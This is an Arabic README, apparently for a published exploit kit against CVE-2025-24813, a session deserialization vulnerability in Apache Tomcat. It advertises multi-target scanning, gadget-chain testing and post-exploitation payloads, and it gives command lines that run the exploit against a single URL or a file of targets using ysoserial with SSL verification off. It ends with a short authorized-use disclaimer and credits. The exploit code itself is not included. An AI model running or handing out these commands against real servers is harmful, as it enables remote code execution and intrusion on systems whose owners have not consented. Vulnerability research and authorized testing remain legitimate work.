
مجموعة أدوات استغلال آلية لـ CVE-2025-24813 تستهدف إلغاء تسلسل الجلسات غير الآمن في Apache Tomcat. تتميز بمسح متعدد الأهداف، واختبار سلاسل الأدوات، واكتشاف نظام التشغيل، وحمولات ما بعد الاستغلال.
هذه أداة استغلال متقدمة وآلية لـ CVE-2025-24813، تستهدف خوادم Apache Tomcat المعرضة لثغرة إلغاء تسلسل الجلسة غير الآمنة.
--targets / --url)# Single target
python3 exploit_cve_2025_24813.py \
--url http://target:8080 \
--ysoserial ysoserial.jar \
--no-ssl-verify
# Multiple targets from file
python3 exploit_cve_2025_24813.py \
--targets targets.txt \
--ysoserial ysoserial.jar \
--no-ssl-verify
Python 3.6+
Java Runtime (لـ ysoserial)
ملف ysoserial الثنائي لجافا
تم توفير هذه الأداة لأغراض تعليمية واختبار أمني مصرح به فقط. أي استخدام غير مصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها ممنوع تمامًا وقد يكون غير قانوني. 📚 الإسنادات
تم استلهام هذا المشروع من إثبات مفهوم عام منشور تحت رخصة Apache 2.0. مؤلف إثبات المفهوم الأصلي: absholi7ly تم تحسينه وإعادة كتابته بواسطة mehrdad mirabi